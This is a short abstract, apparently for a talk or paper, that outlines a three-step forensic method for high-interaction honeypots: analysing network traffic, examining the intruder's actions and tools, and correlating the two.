Honeypot forensics

The deployment of low-interaction honeypots used mainly as deception tools has become more and more common these days. Another interesting but more resource and time consuming playground is made available thanks to high interaction honeypots where a blackhat can connect to the system and download, install and execute his own tools in a less constrained environment. Once caught in the honeypot, the blackhat leaves many fingerprints behind: network (information gathering scans, IRC chats, mail, etc) and system activity (what he did on the system, which tools he used, etc). The aim of honeypot forensics is to identify these fingerprints as part of the evidence gathering process. We present a methodology that will help the analyst to achieve this goal. The first step is to analyze the honeypot's ingress and egress network traffic. The second one is to look at the actions performed by the blackhat and the tools he used on the honeypot. The next step is to correlate these data: network and system events are joined to identify common events or patterns, and also to highlight unexplained items and focus on them.